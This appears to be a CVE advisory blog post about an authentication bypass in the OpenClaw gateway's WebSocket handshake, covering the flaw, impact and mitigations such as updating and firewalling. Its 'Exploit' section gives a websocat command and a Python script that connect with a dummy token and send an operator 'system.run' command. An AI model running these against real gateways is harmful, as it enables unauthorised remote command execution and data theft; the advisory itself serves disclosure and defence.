Listen to this Post
CVE-2026-28472 is a critical vulnerability in OpenClaw versions prior to 2026.2.2, residing in the gateway’s WebSocket connection handshake. The flaw occurs because the handshake logic checks for the presence of an `auth.token` parameter but fails to perform any validation on the token’s content or authenticity. Normally, a device must complete an identity check and pairing process to establish a WebSocket connection. However, by simply including any value—valid, invalid, or malformed—in the `auth.token` field during the connection request, an attacker can completely bypass these mandatory device identity checks. The gateway sees the token is present and, due to the flawed logic, skips the subsequent validation steps, granting the connection. This allows an unauthenticated, remote attacker to connect directly to the gateway as if they were a trusted operator device. Once connected with operator-level access, the attacker can leverage other authenticated APIs to execute arbitrary commands, access sensitive data, and compromise the entire OpenClaw deployment, which often manages critical automation and communication channels.
DailyCVE Form:
Platform: OpenClaw
Version: < 2026.2.2
Vulnerability: Auth Bypass
Severity: CRITICAL
date: 2026-03-05
Prediction: Patch 2026-02-02
What Undercode Say:
Analytics:
The vulnerability allows a complete bypass of device identity verification. Attackers need only network access to the OpenClaw gateway and can send a single, crafted WebSocket handshake request. The presence of an `auth.token` field, regardless of its validity, is the sole trigger for the flawed logic.
Exploit:
The core of the exploit is the WebSocket handshake. An attacker can use tools like `websocat` or a simple Python script to connect.
Example using websocat to connect to the gateway with a dummy token websocat "ws://target-openclaw-gateway:port/path?auth.token=anything"
Python example to exploit the handshake bypass
import asyncio
import websockets
async def exploit():
uri = "ws://target-openclaw-gateway:8080/?auth.token=anything"
async with websockets.connect(uri) as websocket:
If the connection is successful, the exploit works.
print("Connection successful! Bypassed device identity check.")
Now the attacker can send gateway commands as an operator.
await websocket.send('{"type": "operator.command", "command": "system.run", "args": ["id"]}')
response = await websocket.recv()
print(f"Response: {response}")
asyncio.run(exploit())
Protection from this CVE:
Immediate action: Update OpenClaw to version 2026.2.2 or later, which contains the fix for this vulnerability.
Verification: Check the current version.
Command to check OpenClaw version (example) openclaw --version Or via package manager dpkg -l | grep openclaw
If update is not immediate, restrict network access to the OpenClaw gateway using firewall rules to allow connections only from trusted IP ranges.
Impact:
Successful exploitation grants an attacker unauthorized operator-level access to the OpenClaw gateway. This can lead to full system compromise, including the ability to execute arbitrary commands on connected nodes, access and exfiltrate sensitive data from integrated services (like Slack, Telegram, or email), intercept and manipulate communications, and use the compromised gateway as a pivot point to attack internal network resources.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

